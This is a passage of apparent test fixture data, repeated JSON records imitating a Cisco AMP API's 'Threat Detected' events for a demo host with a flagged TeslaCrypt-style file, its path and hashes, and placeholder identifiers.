Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":693000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":630000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196260","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":584000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196259","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":443000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196258","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":396000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196257","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196256","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":365000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196254","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196253","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":287000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":256000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":209000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196244","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196243","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":147000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196242","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 